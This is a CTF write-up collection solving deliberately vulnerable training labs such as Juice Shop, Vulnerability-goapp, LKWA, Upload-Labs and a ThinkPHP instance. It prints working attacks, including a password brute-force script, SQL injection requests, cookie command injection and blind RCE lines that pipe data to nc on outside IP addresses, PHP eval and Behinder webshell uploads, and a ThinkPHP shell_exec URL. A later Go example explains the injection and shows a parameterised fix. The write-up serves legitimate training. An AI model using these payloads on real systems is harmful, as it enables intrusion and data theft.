BUUCTF Notes: Write-ups for the Basic Section

Disclaimer: this article is a study record for learning and research only. Do not use it for illegal purposes; if you do, the consequences are yours alone!

1.Linux Labs

This challenge is just about getting familiar with ssh.

Log in and find flag.txt:

2.Java Sec Code

This one left me a bit speechless; it feels more like an advertisement for the Java Sec Code project.

Get the flag: http://057bfb68-fe8f-4ecb-ad38-ad35f029e01b.node3.buuoj.cn/rce/exec?cmd=env

Aside: for learning Java vulnerabilities this GitHub project really is excellent. We should not limit ourselves to grabbing flags for points; what matters more is digging into the ideas behind the code.

As the project author puts it, a lot of Java written by developers is vulnerable, and rather than spending time hunting bugs across the whole world, it is better to study carefully how the common vulnerabilities are actually written. The author works on offence and defence at Alibaba; his main contribution is deliberately writing an application full of vulnerabilities so that everyone can audit the code and compare what a safe implementation and a vulnerable implementation look like.

3.Juice Shop

This one is also very good. As the GitHub README says: OWASP Juice Shop is probably the most modern and sophisticated insecure web application! It can be used in security trainings, awareness demos, CTFs and as a guinea pig for security tools! Juice Shop encompasses vulnerabilities from the entire OWASP Top Ten along with many other security flaws found in real-world applications!

Awesome!

Go in:

Take a look at the page source:


<!--
  ~ Copyright (c) 2014-2020 Bjoern Kimminich.
  ~ SPDX-License-Identifier: MIT
  -->

<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>OWASP Juice Shop</title>
  <meta name="description" content="Probably the most modern and sophisticated insecure web application">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link id="favicon" rel="icon" type="image/x-icon" href="assets/public/favicon_js.ico">
  <link rel="stylesheet" type="text/css" href="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.css" />
  <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
  <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script>
    window.addEventListener("load", function(){
      window.cookieconsent.initialise({
        "palette": {
          "popup": { "background": "#546e7a", "text": "#ffffff" },
          "button": { "background": "#558b2f", "text": "#ffffff" }
        },
        "theme": "classic",
        "position": "bottom-right",
        "content": { "message": "This website uses fruit cookies to ensure you get the juiciest tracking experience.", "dismiss": "Me want it!", "link": "But me wait!", "href": "https://www.youtube.com/watch?v=9PnbKL3wuH4" }
      })});
  </script>
<link rel="stylesheet" href="styles.css"></head>
<body class="mat-app-background bluegrey-lightgreen-theme">
  <app-root></app-root>
<script src="runtime-es2018.js" type="module"></script><script src="runtime-es5.js" nomodule defer></script><script src="polyfills-es5.js" nomodule defer></script><script src="polyfills-es2018.js" type="module"></script><script src="vendor-es2018.js" type="module"></script><script src="vendor-es5.js" nomodule defer></script><script src="main-es2018.js" type="module"></script><script src="main-es5.js" nomodule defer></script></body>
</html>

Nothing. So I searched Baidu and found write-ups saying that viewing the page source reveals the #/score-board page. Odd.

Let's just visit it first:

There it is. The challenge-and-answer format is very helpful for building all-round web pentesting skills.

Challenge 1: Find the carefully hidden 'Score Board' page.

You successfully solved a challenge: Score Board (Find the carefully hidden 'Score Board' page.)

But the page source shown above really does not contain this hint. The route is not in index.html at all: it lives in the minified Angular bundle (main-es2018.js / main-es5.js, loaded at the bottom of the page), where searching for "score-board" turns up the path.

Challenge 2: Give a devastating zero-star feedback to the store.

The feedback form's submit button stays disabled until a star is chosen; removing the disabled attribute in the browser's developer tools, or sending the feedback request directly with a rating of 0, submits the zero-star review.

4.NSB_Login

Confirmed that the username admin exists; viewing the source revealed a hint:

Exported rockyou from Kali and brute-forced with Burp:

133 MB and 14 million lines; this is going to take a while:

Hmm, Burp crashed. Forget it, back to code:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests

url = "http://17740528-4330-4259-b509-34a053f9ce62.node3.buuoj.cn/login.php"
HX = "密码错误"  # the "wrong password" text the login page returns (Unicode-escaped in the body)

session = requests.Session()  # reuse one connection instead of opening a new one per guess

# rockyou.txt is not clean UTF-8; skip undecodable bytes instead of crashing mid-run
with open('C:\\Users\\root\\Desktop\\rockyou.txt', encoding='utf-8', errors='ignore') as dir:
    for i, line in enumerate(dir):
        line = line.rstrip('\r\n')
        d = {'email': 'admin', 'password': line, 'remember_me': 0}
        r = session.post(url, data=d)
        print(line)
        # every failed attempt on this target returns the same 51-character body;
        # any other length means a different response (the flag, as it turned out)
        if len(r.text) != 51:
            body = r.text.encode('ascii', 'backslashreplace').decode('unicode_escape')
            print('Password found, line ' + str(i) + ':\n' + body)
            break

Brute-forced the password and the flag:

Note: this challenge is a bit strange. The password itself could not be brute-forced, but the response body gave the flag away.

5.bWAPP

Get the flag (phpi.php passes the message parameter to eval(), so any PHP expression runs): http://54808425-f223-4ed1-abcd-1a7e96ebb001.node3.buuoj.cn/phpi.php?message=phpinfo();

6.Vulnerability-goapp

Register an arbitrary account:

Testing shows there is SQL injection in the TimeLine search (note also that the SessionID cookie in the request below, MUAxLmNvbQ==, is just base64 of the e-mail 1@1.com, so sessions are trivially forgeable):

POST /timeline/searchpost HTTP/1.1
Host: 889c91e4-adfa-4a8c-92d0-d2c90ec45aee.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Origin: http://889c91e4-adfa-4a8c-92d0-d2c90ec45aee.node3.buuoj.cn
Connection: keep-alive
Referer: http://889c91e4-adfa-4a8c-92d0-d2c90ec45aee.node3.buuoj.cn/timeline
Cookie: UserName=tom; SessionID=MUAxLmNvbQ==; UserID=4; adminSID=
Upgrade-Insecure-Requests: 1

post=%22+union+select+(SELECT+group_concat(table_name)+from+information_schema.tables+where+table_schema="vulnapp")%2C1%3B

Next dump the column names, with the aim of extracting the administrator credentials and logging in:

Dump the administrator e-mails (admin@admin.com and amuro@ray.com):

POST /timeline/searchpost HTTP/1.1
Host: 889c91e4-adfa-4a8c-92d0-d2c90ec45aee.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Origin: http://889c91e4-adfa-4a8c-92d0-d2c90ec45aee.node3.buuoj.cn
Connection: keep-alive
Referer: http://889c91e4-adfa-4a8c-92d0-d2c90ec45aee.node3.buuoj.cn/timeline
Cookie: UserName=tom; SessionID=MUAxLmNvbQ==; UserID=4; adminSID=
Upgrade-Insecure-Requests: 1

post=%22+union+select+(SELECT+group_concat(mail)+from+vulnapp.admins)%2C1%3B

Dump the passwords:

Log in and look around:

Nothing useful. A Baidu search turns up:

Go language code security audit sharing

which shows that the adminusers URL has an arbitrary command execution issue:

Line 52 of pkg/admin/admin.go contains a command injection; at a glance, the cookie contents are concatenated into a command string and executed. Let's audit it:

package admin

import (
	"database/sql"
	"fmt"
	"html/template"
	"log"
	"math/rand"
	"net/http"
	"os/exec"
	"strings"
	"time"

	"golang.org/x/xerrors"

	"github.com/hardw01f/Vulnerability-goapp/pkg/cookie"
)

type Lists struct {
	Uid       string
	UserName  string
	UserLists []string
}

func GetRandString() string {
	rand.Seed(time.Now().UnixNano())
	var letterRunes = []rune("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ")

	b := make([]rune, 32)
	for i := range b {
		b[i] = letterRunes[rand.Intn(len(letterRunes))]
	}
	return string(b)
}

func StoreAdminSID(adminSessionID string) {
	db, err := sql.Open("mysql", "root:rootwolf@tcp(mysql)/vulnapp")
	if err != nil {
		log.Fatal(err)
	}
	defer db.Close()

	_, err = db.Exec("insert into adminsessions(adminsessionid) values(?)", adminSessionID)
	if err != nil {
		fmt.Printf("%+v\n", err)
	}

}

func GetAdminSid(adminSessionCookie string) (results string, err error) {
	commandLine := "mysql -h mysql -u root -prootwolf -e 'select adminsid from vulnapp.adminsessions where adminsessionid=\"" + adminSessionCookie + "\";'"

	res, err := exec.Command("sh", "-c", commandLine).Output()
	if err != nil {
		fmt.Println(err)
	}

	results = string(res)

	if results != "" {
		return results, nil
	}

	err = xerrors.New("recode was not set")

	return "", err
}

func ShowAdminLogIn(w http.ResponseWriter, r *http.Request) {
	if r.Method == "GET" {
		if cookie.CheckSessionID(r) {
			t, _ := template.ParseFiles("./views/admin/adminlogin.gtpl")
			t.Execute(w, nil)
		} else {
			http.Redirect(w, r, "/login", 302)
		}
	} else {
		http.NotFound(w, nil)
	}
}

func Confirm(w http.ResponseWriter, r *http.Request) {
	if r.Method == "POST" {
		requestMail := r.FormValue("adminmail")
		requestPasswd := r.FormValue("adminpasswd")

		fmt.Println(requestMail, ":", requestPasswd)

		cmd := "mysql -h mysql -u root -prootwolf -e 'select adminid from vulnapp.admins where mail=\"" + requestMail + "\" and passwd=\"" + requestPasswd + "\";'"

		fmt.Println(cmd)

		res, err := exec.Command("sh", "-c", cmd).Output()
		if err != nil {
			fmt.Println("err : ", err)
		}

		if string(res) == "" {
			fmt.Println("not")
			t, _ := template.ParseFiles("./views/admin/failedauthentication.gtpl")
			t.Execute(w, nil)
			return
		}

		fmt.Println(string(res))
		fmt.Println("success")

		adminSessionID := GetRandString()
		fmt.Println(adminSessionID)

		adminSID := &http.Cookie{
			Name:  "adminSID",
			Value: adminSessionID,
		}
		http.SetCookie(w, adminSID)

		StoreAdminSID(adminSessionID)

		t, _ := template.ParseFiles("./views/admin/successauthentication.gtpl")
		t.Execute(w, nil)

	} else {
		http.NotFound(w, nil)
	}
}

func ShowAdminPage(w http.ResponseWriter, r *http.Request) {
	if r.Method == "GET" {
		adminSID, err := r.Cookie("adminSID")
		if err != nil {
			fmt.Printf("%+v\n", err)
		}
		fmt.Println(adminSID.Value)

		adminUid, err := GetAdminSid(adminSID.Value)
		if err != nil {
			fmt.Println("not authentication")
			t, _ := template.ParseFiles("./views/admin/failedauthentication.gtpl")
			t.Execute(w, nil)
			return
		}

		fmt.Println(adminUid)

		uid, err := r.Cookie("UserID")
		if err != nil {
			fmt.Println(err)
		}
		fmt.Println(uid)

		userName, err := r.Cookie("UserName")
		if err != nil {
			fmt.Println(err)
		}
		fmt.Println(userName.Value)

		cmd := "mysql -h mysql -u root -prootwolf -e 'select id,name,mail,age,created_at,updated_at from vulnapp.user where name not in (\"" + userName.Value + "\");'"

		fmt.Println(cmd)

		res, err := exec.Command("sh", "-c", cmd).Output()
		if err != nil {
			fmt.Println("err : ", err)
		}

		splitedRes := strings.Split(string(res), "\n")
		fmt.Println(splitedRes)

		p := Lists{Uid: uid.Value, UserName: userName.Value, UserLists: splitedRes}

		fmt.Println(p)

		t, _ := template.ParseFiles("./views/admin/userlists.gtpl")
		t.Execute(w, p)

	} else {
		http.NotFound(w, nil)
	}
}

Focus on the GetAdminSid method:

func GetAdminSid(adminSessionCookie string) (results string, err error) {
	commandLine := "mysql -h mysql -u root -prootwolf -e 'select adminsid from vulnapp.adminsessions where adminsessionid=\"" + adminSessionCookie + "\";'"

	res, err := exec.Command("sh", "-c", commandLine).Output()
	if err != nil {
		fmt.Println(err)
	}

	results = string(res)

	if results != "" {
		return results, nil
	}

	err = xerrors.New("recode was not set")

	return "", err
}

Now see where adminSessionCookie comes from: ShowAdminPage reads the adminSID cookie with r.Cookie("adminSID") and passes adminSID.Value to GetAdminSid unchanged, so the value is fully attacker-controlled. The same pattern repeats in Confirm, where adminmail and adminpasswd go straight into a mysql command line, and in ShowAdminPage's use of the UserName cookie.
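As an added example (not code from the Vulnerability-goapp project or from the original write-up), the Go program below isolates the root cause shared by the searchpost SQL injection above and the adminSID command injection: user input concatenated into a string that is then handed to an interpreter. It rebuilds the command line exactly as GetAdminSid does, counts the pipe operators sh would see outside quotes, and shows the hardened replacement: an allow-list check matching what GetRandString can actually produce (32 ASCII letters) plus a parameterised database/sql query, the same mechanism StoreAdminSID already uses. The names BuildLegacyCommandLine, TopLevelPipes, ValidSessionID and GetAdminSidSafe are this example's own; the *sql.DB passed to GetAdminSidSafe is assumed to come from sql.Open with a registered MySQL driver, as in the app.

```go
package main

import (
	"database/sql"
	"errors"
	"fmt"
	"regexp"
)

// BuildLegacyCommandLine reproduces the string concatenation in GetAdminSid.
// The cookie value lands inside a single-quoted sh argument, so a single quote
// in the cookie closes that argument and everything after it is parsed by sh.
func BuildLegacyCommandLine(adminSessionCookie string) string {
	return "mysql -h mysql -u root -prootwolf -e 'select adminsid from vulnapp.adminsessions where adminsessionid=\"" +
		adminSessionCookie + "\";'"
}

// TopLevelPipes counts '|' characters that sh would treat as pipeline operators,
// i.e. those outside single and double quotes (backslash escapes honoured outside
// single quotes). The legitimate command never contains a pipe, so any non-zero
// count means the cookie escaped its quoting.
func TopLevelPipes(cmdline string) int {
	inSingle, inDouble, escaped := false, false, false
	pipes := 0
	for _, c := range cmdline {
		switch {
		case escaped:
			escaped = false
		case inSingle:
			if c == '\'' {
				inSingle = false
			}
		case inDouble:
			switch c {
			case '\\':
				escaped = true
			case '"':
				inDouble = false
			}
		default:
			switch c {
			case '\\':
				escaped = true
			case '\'':
				inSingle = true
			case '"':
				inDouble = true
			case '|':
				pipes++
			}
		}
	}
	return pipes
}

// sessionIDPattern matches exactly what GetRandString can produce: 32 ASCII letters.
var sessionIDPattern = regexp.MustCompile(`^[A-Za-z]{32}$`)

// ValidSessionID is the allow-list check the handler should apply to the cookie
// before the value is used anywhere.
func ValidSessionID(s string) bool {
	return sessionIDPattern.MatchString(s)
}

var ErrNoSession = errors.New("record was not set")

// GetAdminSidSafe is a hardened replacement for GetAdminSid: validate first, then
// query through database/sql with a placeholder. No shell is spawned and the cookie
// can never be interpreted as SQL or as sh syntax. db is assumed (example
// assumption) to have been opened with a registered MySQL driver, as in the app.
func GetAdminSidSafe(db *sql.DB, adminSessionCookie string) (string, error) {
	if !ValidSessionID(adminSessionCookie) {
		return "", fmt.Errorf("malformed adminSID cookie: %q", adminSessionCookie)
	}
	var adminSID string
	err := db.QueryRow(
		"select adminsid from vulnapp.adminsessions where adminsessionid = ?",
		adminSessionCookie,
	).Scan(&adminSID)
	if errors.Is(err, sql.ErrNoRows) {
		return "", ErrNoSession
	}
	if err != nil {
		return "", err
	}
	return adminSID, nil
}

func main() {
	// Constructed inputs: a legitimate-looking 32-letter session ID, and the cookie
	// value this write-up sent to /adminusers.
	benign := "ciXSnSZDcwIhJgmtYPSBSVZEIpclEUPF"
	payload := benign + "'|echo `env`|nc 116.85.64.251 1234|echo '"
	for _, c := range []string{benign, payload} {
		cmd := BuildLegacyCommandLine(c)
		fmt.Printf("valid=%v pipes=%d cmd=%s\n", ValidSessionID(c), TopLevelPipes(cmd), cmd)
	}
}
```

Running it shows the benign ID producing zero top-level pipes and the payload producing three: the injected `|echo `env`|nc ...|echo` pipeline that sh executes. The same `?` placeholder approach is the fix for the `post` parameter of /timeline/searchpost; quoting helpers at the sh level are not a fix, dropping the shell is.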

Rent a server and reproduce it with nc (server address: 116.85.64.251):

GET /adminusers HTTP/1.1
Host: 889c91e4-adfa-4a8c-92d0-d2c90ec45aee.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://889c91e4-adfa-4a8c-92d0-d2c90ec45aee.node3.buuoj.cn/adminconfirm
Cookie: UserName=tom; SessionID=MUAxLmNvbQ==; UserID=4;adminSID=ciXSnSZDcwIhJgmtYPSBSVZEIpclEUPF'|echo `env`|nc 116.85.64.251 1234|echo '
Upgrade-Insecure-Requests: 1

Then listen on port 1234 on 116.85.64.251 and the flag comes back:

Aside: this challenge really tests Go code-auditing ability; getting the flag is not the most important part.

7.LKWA

Aside: once again the focus should be code auditing and improving our own auditing ability; the flag is not the end goal.

Lesser Known Web Attack Lab is for intermediate pentester that can test and practice lesser known web attacks such as Object Injection, XSSI, PHAR Deserialization, variables variable ..etc. Write-ups are welcome. My own walk-through is here .

Vulnerabilities currently present in the project:

  • Blind RCE
  • XSSI
  • PHAR Deserialization
  • PHP Object Injection
  • PHP Object Injection via Cookies
  • PHP Object Injection (Object Reference)
  • SSRF
  • Variables variable

Seeing this I already had a plan: blind RCE, the big gun!

There is no output echoed back, but that does not matter; it works just the same.

First echo env: no flag there, so I blindly guessed there is a flag file in the root directory:

Rent a server and listen on port 1234: nc -lvvp 1234

Then execute the command: echo `cat /flag`|nc 116.85.25.7 1234|echo

And the server does indeed catch the flag:

8.Webug 4.0

After logging in with admin/admin:

Choose file upload.

payload:

POST /control/upload_file/upload_file_1.php HTTP/1.1
Host: afab4711-bc37-4bc6-b0c5-4878eaa53034.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------38371522652734190106744779495
Content-Length: 396
Origin: http://afab4711-bc37-4bc6-b0c5-4878eaa53034.node3.buuoj.cn
Connection: keep-alive
Referer: http://afab4711-bc37-4bc6-b0c5-4878eaa53034.node3.buuoj.cn/control/upload_file/upload_file_1.php
Cookie: PHPSESSID=n92qahrtf87daufabjviq65261
Upgrade-Insecure-Requests: 1

-----------------------------38371522652734190106744779495
Content-Disposition: form-data; name="file"; filename="2.phtml"
Content-Type: image/png

GIF89a>>>><script language='php'>eval($_GET['shell']);</script>
-----------------------------38371522652734190106744779495
Content-Disposition: form-data; name="submit"

上传
-----------------------------38371522652734190106744779495--

Get the flag (this payload relies on the `<script language='php'>` tag, which PHP 7.0 removed; on a PHP 7 target use a normal `<?php ?>` block instead):

http://afab4711-bc37-4bc6-b0c5-4878eaa53034.node3.buuoj.cn/template/upload/2.phtml?shell=phpinfo();

9.PikaChu

10.[Windows]Upload-Labs-Windows

Level 1: upload a Behinder (冰蝎) webshell:

POST /Pass-01/index.php HTTP/1.1
Host: 76a7821b-187a-4035-b40e-3a61f273afce.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------131545444913111702653512167775
Content-Length: 825
Origin: http://76a7821b-187a-4035-b40e-3a61f273afce.node3.buuoj.cn
Connection: keep-alive
Referer: http://76a7821b-187a-4035-b40e-3a61f273afce.node3.buuoj.cn/Pass-01/index.php
Upgrade-Insecure-Requests: 1

-----------------------------131545444913111702653512167775
Content-Disposition: form-data; name="upload_file"; filename="3.php"
Content-Type: image/png

<?php 
@error_reporting(0);
session_start();
$key="e45e329feb5d925b";
$_SESSION["k"]=$key;
$post=file_get_contents("php://input");
if(!extension_loaded("openssl")){
	$t="base64_"."decode";
	$post=$t($post."");
	for($i=0;$i<strlen($post);$i++) {$post[$i] = $post[$i]^$key[$i+1&15]; }}else{$post=openssl_decrypt($post, "AES128", $key);}$arr=explode("|",$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p) {eval($p."");}}@call_user_func(new C(),$params);?>
-----------------------------131545444913111702653512167775
Content-Disposition: form-data; name="submit"

上传
-----------------------------131545444913111702653512167775--

Connect to the shell with Behinder:

The file Fl@g_glzjin_still_w@nts_a_girl_friend.txt is found

The flag is inside.

11.LFI Labs

12.AWD-Test1

http://4bad8dd0-53ec-4f0d-a435-c29dd8e0f144.node4.buuoj.cn:81/index.phpindex.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cat%20/flag

One request and the flag is out: this is the ThinkPHP 5.0.x invokefunction RCE, where vars[0] names the PHP function to call (shell_exec) and vars[1][] supplies its argument.
